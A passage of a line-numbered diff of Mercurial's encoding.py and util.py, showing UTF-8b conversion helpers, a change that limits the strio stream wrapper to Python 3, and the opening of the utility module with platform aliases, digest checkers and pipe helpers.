458 _utf8len = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 4]
459
459
460 def getutf8char(s, pos):
460 def getutf8char(s, pos):
461 '''get the next full utf-8 character in the given string, starting at pos
461 '''get the next full utf-8 character in the given string, starting at pos
462
462
463 Raises a UnicodeError if the given location does not start a valid
463 Raises a UnicodeError if the given location does not start a valid
464 utf-8 character.
464 utf-8 character.
465 '''
465 '''
466
466
467 # find how many bytes to attempt decoding from first nibble
467 # find how many bytes to attempt decoding from first nibble
468 l = _utf8len[ord(s[pos]) >> 4]
468 l = _utf8len[ord(s[pos]) >> 4]
469 if not l: # ascii
469 if not l: # ascii
470 return s[pos]
470 return s[pos]
471
471
472 c = s[pos:pos + l]
472 c = s[pos:pos + l]
473 # validate with attempted decode
473 # validate with attempted decode
474 c.decode("utf-8")
474 c.decode("utf-8")
475 return c
475 return c
476
476
477 def toutf8b(s):
477 def toutf8b(s):
478 '''convert a local, possibly-binary string into UTF-8b
478 '''convert a local, possibly-binary string into UTF-8b
479
479
480 This is intended as a generic method to preserve data when working
480 This is intended as a generic method to preserve data when working
481 with schemes like JSON and XML that have no provision for
481 with schemes like JSON and XML that have no provision for
482 arbitrary byte strings. As Mercurial often doesn't know
482 arbitrary byte strings. As Mercurial often doesn't know
483 what encoding data is in, we use so-called UTF-8b.
483 what encoding data is in, we use so-called UTF-8b.
484
484
485 If a string is already valid UTF-8 (or ASCII), it passes unmodified.
485 If a string is already valid UTF-8 (or ASCII), it passes unmodified.
486 Otherwise, unsupported bytes are mapped to UTF-16 surrogate range,
486 Otherwise, unsupported bytes are mapped to UTF-16 surrogate range,
487 uDC00-uDCFF.
487 uDC00-uDCFF.
488
488
489 Principles of operation:
489 Principles of operation:
490
490
491 - ASCII and UTF-8 data successfully round-trips and is understood
491 - ASCII and UTF-8 data successfully round-trips and is understood
492 by Unicode-oriented clients
492 by Unicode-oriented clients
493 - filenames and file contents in arbitrary other encodings can have
493 - filenames and file contents in arbitrary other encodings can have
494 be round-tripped or recovered by clueful clients
494 be round-tripped or recovered by clueful clients
495 - local strings that have a cached known UTF-8 encoding (aka
495 - local strings that have a cached known UTF-8 encoding (aka
496 localstr) get sent as UTF-8 so Unicode-oriented clients get the
496 localstr) get sent as UTF-8 so Unicode-oriented clients get the
497 Unicode data they want
497 Unicode data they want
498 - because we must preserve UTF-8 bytestring in places such as
498 - because we must preserve UTF-8 bytestring in places such as
499 filenames, metadata can't be roundtripped without help
499 filenames, metadata can't be roundtripped without help
500
500
501 (Note: "UTF-8b" often refers to decoding a mix of valid UTF-8 and
501 (Note: "UTF-8b" often refers to decoding a mix of valid UTF-8 and
502 arbitrary bytes into an internal Unicode format that can be
502 arbitrary bytes into an internal Unicode format that can be
503 re-encoded back into the original. Here we are exposing the
503 re-encoded back into the original. Here we are exposing the
504 internal surrogate encoding as a UTF-8 string.)
504 internal surrogate encoding as a UTF-8 string.)
505 '''
505 '''
506
506
507 if "\xed" not in s:
507 if "\xed" not in s:
508 if isinstance(s, localstr):
508 if isinstance(s, localstr):
509 return s._utf8
509 return s._utf8
510 try:
510 try:
511 s.decode('utf-8')
511 s.decode('utf-8')
512 return s
512 return s
513 except UnicodeDecodeError:
513 except UnicodeDecodeError:
514 pass
514 pass
515
515
516 r = ""
516 r = ""
517 pos = 0
517 pos = 0
518 l = len(s)
518 l = len(s)
519 while pos < l:
519 while pos < l:
520 try:
520 try:
521 c = getutf8char(s, pos)
521 c = getutf8char(s, pos)
522 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
522 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
523 # have to re-escape existing U+DCxx characters
523 # have to re-escape existing U+DCxx characters
524 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
524 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
525 pos += 1
525 pos += 1
526 else:
526 else:
527 pos += len(c)
527 pos += len(c)
528 except UnicodeDecodeError:
528 except UnicodeDecodeError:
529 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
529 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
530 pos += 1
530 pos += 1
531 r += c
531 r += c
532 return r
532 return r
533
533
534 def fromutf8b(s):
534 def fromutf8b(s):
535 '''Given a UTF-8b string, return a local, possibly-binary string.
535 '''Given a UTF-8b string, return a local, possibly-binary string.
536
536
537 return the original binary string. This
537 return the original binary string. This
538 is a round-trip process for strings like filenames, but metadata
538 is a round-trip process for strings like filenames, but metadata
539 that's was passed through tolocal will remain in UTF-8.
539 that's was passed through tolocal will remain in UTF-8.
540
540
541 >>> roundtrip = lambda x: fromutf8b(toutf8b(x)) == x
541 >>> roundtrip = lambda x: fromutf8b(toutf8b(x)) == x
542 >>> m = "\\xc3\\xa9\\x99abcd"
542 >>> m = "\\xc3\\xa9\\x99abcd"
543 >>> toutf8b(m)
543 >>> toutf8b(m)
544 '\\xc3\\xa9\\xed\\xb2\\x99abcd'
544 '\\xc3\\xa9\\xed\\xb2\\x99abcd'
545 >>> roundtrip(m)
545 >>> roundtrip(m)
546 True
546 True
547 >>> roundtrip("\\xc2\\xc2\\x80")
547 >>> roundtrip("\\xc2\\xc2\\x80")
548 True
548 True
549 >>> roundtrip("\\xef\\xbf\\xbd")
549 >>> roundtrip("\\xef\\xbf\\xbd")
550 True
550 True
551 >>> roundtrip("\\xef\\xef\\xbf\\xbd")
551 >>> roundtrip("\\xef\\xef\\xbf\\xbd")
552 True
552 True
553 >>> roundtrip("\\xf1\\x80\\x80\\x80\\x80")
553 >>> roundtrip("\\xf1\\x80\\x80\\x80\\x80")
554 True
554 True
555 '''
555 '''
556
556
557 # fast path - look for uDxxx prefixes in s
557 # fast path - look for uDxxx prefixes in s
558 if "\xed" not in s:
558 if "\xed" not in s:
559 return s
559 return s
560
560
561 # We could do this with the unicode type but some Python builds
561 # We could do this with the unicode type but some Python builds
562 # use UTF-16 internally (issue5031) which causes non-BMP code
562 # use UTF-16 internally (issue5031) which causes non-BMP code
563 # points to be escaped. Instead, we use our handy getutf8char
563 # points to be escaped. Instead, we use our handy getutf8char
564 # helper again to walk the string without "decoding" it.
564 # helper again to walk the string without "decoding" it.
565
565
566 r = ""
566 r = ""
567 pos = 0
567 pos = 0
568 l = len(s)
568 l = len(s)
569 while pos < l:
569 while pos < l:
570 c = getutf8char(s, pos)
570 c = getutf8char(s, pos)
571 pos += len(c)
571 pos += len(c)
572 # unescape U+DCxx characters
572 # unescape U+DCxx characters
573 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
573 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
574 c = chr(ord(c.decode("utf-8")) & 0xff)
574 c = chr(ord(c.decode("utf-8")) & 0xff)
575 r += c
575 r += c
576 return r
576 return r
577
577
578 class strio(io.TextIOWrapper):
578 if pycompat.ispy3:
579 """Wrapper around TextIOWrapper that respects hg's encoding assumptions.
579 class strio(io.TextIOWrapper):
580 """Wrapper around TextIOWrapper that respects hg's encoding assumptions.
580
581
581 Also works around Python closing streams.
582 Also works around Python closing streams.
582 """
583 """
583
584
584 def __init__(self, buffer, **kwargs):
585 def __init__(self, buffer):
585 kwargs[r'encoding'] = _sysstr(encoding)
586 super(strio, self).__init__(buffer, encoding=_sysstr(encoding))
586 super(strio, self).__init__(buffer, **kwargs)
587
587
588 def __del__(self):
588 def __del__(self):
589 """Override __del__ so it doesn't close the underlying stream."""
589 """Override __del__ so it doesn't close the underlying stream."""
590 else:
591 strio = pycompat.identity
@@ -1,3777 +1,3776 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import string
36 import string
37 import subprocess
37 import subprocess
38 import sys
38 import sys
39 import tempfile
39 import tempfile
40 import textwrap
40 import textwrap
41 import time
41 import time
42 import traceback
42 import traceback
43 import warnings
43 import warnings
44 import zlib
44 import zlib
45
45
46 from . import (
46 from . import (
47 encoding,
47 encoding,
48 error,
48 error,
49 i18n,
49 i18n,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 )
52 )
53
53
54 base85 = policy.importmod(r'base85')
54 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
55 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
56 parsers = policy.importmod(r'parsers')
57
57
58 b85decode = base85.b85decode
58 b85decode = base85.b85decode
59 b85encode = base85.b85encode
59 b85encode = base85.b85encode
60
60
61 cookielib = pycompat.cookielib
61 cookielib = pycompat.cookielib
62 empty = pycompat.empty
62 empty = pycompat.empty
63 httplib = pycompat.httplib
63 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
64 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 socketserver = pycompat.socketserver
67 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
68 stderr = pycompat.stderr
69 stdin = pycompat.stdin
69 stdin = pycompat.stdin
70 stdout = pycompat.stdout
70 stdout = pycompat.stdout
71 stringio = pycompat.stringio
71 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
72 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
73 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 # workaround for win32mbcs
76 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
78
78
79 def isatty(fp):
79 def isatty(fp):
80 try:
80 try:
81 return fp.isatty()
81 return fp.isatty()
82 except AttributeError:
82 except AttributeError:
83 return False
83 return False
84
84
85 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
87 # buffering
88 if isatty(stdout):
88 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
90
91 if pycompat.osname == 'nt':
91 if pycompat.osname == 'nt':
92 from . import windows as platform
92 from . import windows as platform
93 stdout = platform.winstdout(stdout)
93 stdout = platform.winstdout(stdout)
94 else:
94 else:
95 from . import posix as platform
95 from . import posix as platform
96
96
97 _ = i18n._
97 _ = i18n._
98
98
99 bindunixsocket = platform.bindunixsocket
99 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
100 cachestat = platform.cachestat
101 checkexec = platform.checkexec
101 checkexec = platform.checkexec
102 checklink = platform.checklink
102 checklink = platform.checklink
103 copymode = platform.copymode
103 copymode = platform.copymode
104 executablepath = platform.executablepath
104 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
105 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
106 explainexit = platform.explainexit
107 findexe = platform.findexe
107 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
172 def safehasattr(thing, attr):
172 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
173 return getattr(thing, attr, _notset) is not _notset
174
174
175 def bytesinput(fin, fout, *args, **kwargs):
175 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
176 sin, sout = sys.stdin, sys.stdout
177 try:
177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 if pycompat.ispy3:
179 if pycompat.ispy3:
179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
180 return encoding.strtolocal(input(*args, **kwargs))
180 return encoding.strtolocal(input(*args, **kwargs))
181 else:
181 else:
182 sys.stdin, sys.stdout = fin, fout
183 return raw_input(*args, **kwargs)
182 return raw_input(*args, **kwargs)
184 finally:
183 finally:
185 sys.stdin, sys.stdout = sin, sout
184 sys.stdin, sys.stdout = sin, sout
186
185
187 def bitsfrom(container):
186 def bitsfrom(container):
188 bits = 0
187 bits = 0
189 for bit in container:
188 for bit in container:
190 bits |= bit
189 bits |= bit
191 return bits
190 return bits
192
191
193 # python 2.6 still have deprecation warning enabled by default. We do not want
192 # python 2.6 still have deprecation warning enabled by default. We do not want
194 # to display anything to standard user so detect if we are running test and
193 # to display anything to standard user so detect if we are running test and
195 # only use python deprecation warning in this case.
194 # only use python deprecation warning in this case.
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 if _dowarn:
196 if _dowarn:
198 # explicitly unfilter our warning for python 2.7
197 # explicitly unfilter our warning for python 2.7
199 #
198 #
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
200 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
206
208 def nouideprecwarn(msg, version, stacklevel=1):
207 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
208 """Issue an python native deprecation warning
210
209
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
211 """
213 if _dowarn:
212 if _dowarn:
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 " update your code.)") % version
214 " update your code.)") % version
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
216
218 DIGESTS = {
217 DIGESTS = {
219 'md5': hashlib.md5,
218 'md5': hashlib.md5,
220 'sha1': hashlib.sha1,
219 'sha1': hashlib.sha1,
221 'sha512': hashlib.sha512,
220 'sha512': hashlib.sha512,
222 }
221 }
223 # List of digest types from strongest to weakest
222 # List of digest types from strongest to weakest
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225
224
226 for k in DIGESTS_BY_STRENGTH:
225 for k in DIGESTS_BY_STRENGTH:
227 assert k in DIGESTS
226 assert k in DIGESTS
228
227
229 class digester(object):
228 class digester(object):
230 """helper to compute digests.
229 """helper to compute digests.
231
230
232 This helper can be used to compute one or more digests given their name.
231 This helper can be used to compute one or more digests given their name.
233
232
234 >>> d = digester(['md5', 'sha1'])
233 >>> d = digester(['md5', 'sha1'])
235 >>> d.update('foo')
234 >>> d.update('foo')
236 >>> [k for k in sorted(d)]
235 >>> [k for k in sorted(d)]
237 ['md5', 'sha1']
236 ['md5', 'sha1']
238 >>> d['md5']
237 >>> d['md5']
239 'acbd18db4cc2f85cedef654fccc4a4d8'
238 'acbd18db4cc2f85cedef654fccc4a4d8'
240 >>> d['sha1']
239 >>> d['sha1']
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 >>> digester.preferred(['md5', 'sha1'])
241 >>> digester.preferred(['md5', 'sha1'])
243 'sha1'
242 'sha1'
244 """
243 """
245
244
246 def __init__(self, digests, s=''):
245 def __init__(self, digests, s=''):
247 self._hashes = {}
246 self._hashes = {}
248 for k in digests:
247 for k in digests:
249 if k not in DIGESTS:
248 if k not in DIGESTS:
250 raise Abort(_('unknown digest type: %s') % k)
249 raise Abort(_('unknown digest type: %s') % k)
251 self._hashes[k] = DIGESTS[k]()
250 self._hashes[k] = DIGESTS[k]()
252 if s:
251 if s:
253 self.update(s)
252 self.update(s)
254
253
255 def update(self, data):
254 def update(self, data):
256 for h in self._hashes.values():
255 for h in self._hashes.values():
257 h.update(data)
256 h.update(data)
258
257
259 def __getitem__(self, key):
258 def __getitem__(self, key):
260 if key not in DIGESTS:
259 if key not in DIGESTS:
261 raise Abort(_('unknown digest type: %s') % k)
260 raise Abort(_('unknown digest type: %s') % k)
262 return self._hashes[key].hexdigest()
261 return self._hashes[key].hexdigest()
263
262
264 def __iter__(self):
263 def __iter__(self):
265 return iter(self._hashes)
264 return iter(self._hashes)
266
265
267 @staticmethod
266 @staticmethod
268 def preferred(supported):
267 def preferred(supported):
269 """returns the strongest digest type in both supported and DIGESTS."""
268 """returns the strongest digest type in both supported and DIGESTS."""
270
269
271 for k in DIGESTS_BY_STRENGTH:
270 for k in DIGESTS_BY_STRENGTH:
272 if k in supported:
271 if k in supported:
273 return k
272 return k
274 return None
273 return None
275
274
276 class digestchecker(object):
275 class digestchecker(object):
277 """file handle wrapper that additionally checks content against a given
276 """file handle wrapper that additionally checks content against a given
278 size and digests.
277 size and digests.
279
278
280 d = digestchecker(fh, size, {'md5': '...'})
279 d = digestchecker(fh, size, {'md5': '...'})
281
280
282 When multiple digests are given, all of them are validated.
281 When multiple digests are given, all of them are validated.
283 """
282 """
284
283
285 def __init__(self, fh, size, digests):
284 def __init__(self, fh, size, digests):
286 self._fh = fh
285 self._fh = fh
287 self._size = size
286 self._size = size
288 self._got = 0
287 self._got = 0
289 self._digests = dict(digests)
288 self._digests = dict(digests)
290 self._digester = digester(self._digests.keys())
289 self._digester = digester(self._digests.keys())
291
290
292 def read(self, length=-1):
291 def read(self, length=-1):
293 content = self._fh.read(length)
292 content = self._fh.read(length)
294 self._digester.update(content)
293 self._digester.update(content)
295 self._got += len(content)
294 self._got += len(content)
296 return content
295 return content
297
296
298 def validate(self):
297 def validate(self):
299 if self._size != self._got:
298 if self._size != self._got:
300 raise Abort(_('size mismatch: expected %d, got %d') %
299 raise Abort(_('size mismatch: expected %d, got %d') %
301 (self._size, self._got))
300 (self._size, self._got))
302 for k, v in self._digests.items():
301 for k, v in self._digests.items():
303 if v != self._digester[k]:
302 if v != self._digester[k]:
304 # i18n: first parameter is a digest name
303 # i18n: first parameter is a digest name
305 raise Abort(_('%s mismatch: expected %s, got %s') %
304 raise Abort(_('%s mismatch: expected %s, got %s') %
306 (k, v, self._digester[k]))
305 (k, v, self._digester[k]))
307
306
308 try:
307 try:
309 buffer = buffer
308 buffer = buffer
310 except NameError:
309 except NameError:
311 def buffer(sliceable, offset=0, length=None):
310 def buffer(sliceable, offset=0, length=None):
312 if length is not None:
311 if length is not None:
313 return memoryview(sliceable)[offset:offset + length]
312 return memoryview(sliceable)[offset:offset + length]
314 return memoryview(sliceable)[offset:]
313 return memoryview(sliceable)[offset:]
315
314
316 closefds = pycompat.osname == 'posix'
315 closefds = pycompat.osname == 'posix'
317
316
318 _chunksize = 4096
317 _chunksize = 4096
319
318
320 class bufferedinputpipe(object):
319 class bufferedinputpipe(object):
321 """a manually buffered input pipe
320 """a manually buffered input pipe
322
321
323 Python will not let us use buffered IO and lazy reading with 'polling' at
322 Python will not let us use buffered IO and lazy reading with 'polling' at
324 the same time. We cannot probe the buffer state and select will not detect
323 the same time. We cannot probe the buffer state and select will not detect
325 that data are ready to read if they are already buffered.
324 that data are ready to read if they are already buffered.
326
325
327 This class let us work around that by implementing its own buffering
326 This class let us work around that by implementing its own buffering
328 (allowing efficient readline) while offering a way to know if the buffer is
327 (allowing efficient readline) while offering a way to know if the buffer is
329 empty from the output (allowing collaboration of the buffer with polling).
328 empty from the output (allowing collaboration of the buffer with polling).
330
329
331 This class lives in the 'util' module because it makes use of the 'os'
330 This class lives in the 'util' module because it makes use of the 'os'
332 module from the python stdlib.
331 module from the python stdlib.
333 """
332 """
334
333
335 def __init__(self, input):
334 def __init__(self, input):
336 self._input = input
335 self._input = input
337 self._buffer = []
336 self._buffer = []
338 self._eof = False
337 self._eof = False
339 self._lenbuf = 0
338 self._lenbuf = 0
340
339
341 @property
340 @property
342 def hasbuffer(self):
341 def hasbuffer(self):
343 """True is any data is currently buffered
342 """True is any data is currently buffered
344
343
345 This will be used externally a pre-step for polling IO. If there is
344 This will be used externally a pre-step for polling IO. If there is
346 already data then no polling should be set in place."""
345 already data then no polling should be set in place."""
347 return bool(self._buffer)
346 return bool(self._buffer)
348
347
349 @property
348 @property
350 def closed(self):
349 def closed(self):
351 return self._input.closed
350 return self._input.closed
352
351
353 def fileno(self):
352 def fileno(self):
354 return self._input.fileno()
353 return self._input.fileno()
355
354
356 def close(self):
355 def close(self):
357 return self._input.close()
356 return self._input.close()
358
357
359 def read(self, size):
358 def read(self, size):
360 while (not self._eof) and (self._lenbuf < size):
359 while (not self._eof) and (self._lenbuf < size):
361 self._fillbuffer()
360 self._fillbuffer()
362 return self._frombuffer(size)
361 return self._frombuffer(size)
363
362
364 def readline(self, *args, **kwargs):
363 def readline(self, *args, **kwargs):
365 if 1 < len(self._buffer):
364 if 1 < len(self._buffer):
366 # this should not happen because both read and readline end with a
365 # this should not happen because both read and readline end with a
367 # _frombuffer call that collapse it.
366 # _frombuffer call that collapse it.
368 self._buffer = [''.join(self._buffer)]
367 self._buffer = [''.join(self._buffer)]
369 self._lenbuf = len(self._buffer[0])
368 self._lenbuf = len(self._buffer[0])
370 lfi = -1
369 lfi = -1
371 if self._buffer:
370 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
371 lfi = self._buffer[-1].find('\n')
373 while (not self._eof) and lfi < 0:
372 while (not self._eof) and lfi < 0:
374 self._fillbuffer()
373 self._fillbuffer()
375 if self._buffer:
374 if self._buffer:
376 lfi = self._buffer[-1].find('\n')
375 lfi = self._buffer[-1].find('\n')
377 size = lfi + 1
376 size = lfi + 1
378 if lfi < 0: # end of file
377 if lfi < 0: # end of file
379 size = self._lenbuf
378 size = self._lenbuf
380 elif 1 < len(self._buffer):
379 elif 1 < len(self._buffer):
381 # we need to take previous chunks into account
380 # we need to take previous chunks into account
382 size += self._lenbuf - len(self._buffer[-1])
381 size += self._lenbuf - len(self._buffer[-1])
383 return self._frombuffer(size)
382 return self._frombuffer(size)
384
383
385 def _frombuffer(self, size):
384 def _frombuffer(self, size):
386 """return at most 'size' data from the buffer
385 """return at most 'size' data from the buffer
387
386
388 The data are removed from the buffer."""
387 The data are removed from the buffer."""
389 if size == 0 or not self._buffer:
388 if size == 0 or not self._buffer:
390 return ''
389 return ''
391 buf = self._buffer[0]
390 buf = self._buffer[0]
392 if 1 < len(self._buffer):
391 if 1 < len(self._buffer):
393 buf = ''.join(self._buffer)
392 buf = ''.join(self._buffer)
394
393
395 data = buf[:size]
394 data = buf[:size]
396 buf = buf[len(data):]
395 buf = buf[len(data):]
397 if buf:
396 if buf:
398 self._buffer = [buf]
397 self._buffer = [buf]
399 self._lenbuf = len(buf)
398 self._lenbuf = len(buf)
400 else:
399 else:
401 self._buffer = []
400 self._buffer = []
402 self._lenbuf = 0
401 self._lenbuf = 0
403 return data
402 return data
404
403
405 def _fillbuffer(self):
404 def _fillbuffer(self):
406 """read data to the buffer"""
405 """read data to the buffer"""
407 data = os.read(self._input.fileno(), _chunksize)
406 data = os.read(self._input.fileno(), _chunksize)
408 if not data:
407 if not data:
409 self._eof = True
408 self._eof = True
410 else:
409 else:
411 self._lenbuf += len(data)
410 self._lenbuf += len(data)
412 self._buffer.append(data)
411 self._buffer.append(data)
413
412
414 def popen2(cmd, env=None, newlines=False):
413 def popen2(cmd, env=None, newlines=False):
415 # Setting bufsize to -1 lets the system decide the buffer size.
414 # Setting bufsize to -1 lets the system decide the buffer size.
416 # The default for bufsize is 0, meaning unbuffered. This leads to
415 # The default for bufsize is 0, meaning unbuffered. This leads to
417 # poor performance on Mac OS X: http://bugs.python.org/issue4194
416 # poor performance on Mac OS X: http://bugs.python.org/issue4194
418 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
417 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
419 close_fds=closefds,
418 close_fds=closefds,
420 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
421 universal_newlines=newlines,
420 universal_newlines=newlines,
422 env=env)
421 env=env)
423 return p.stdin, p.stdout
422 return p.stdin, p.stdout
424
423
425 def popen3(cmd, env=None, newlines=False):
424 def popen3(cmd, env=None, newlines=False):
426 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
425 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
427 return stdin, stdout, stderr
426 return stdin, stdout, stderr
428
427
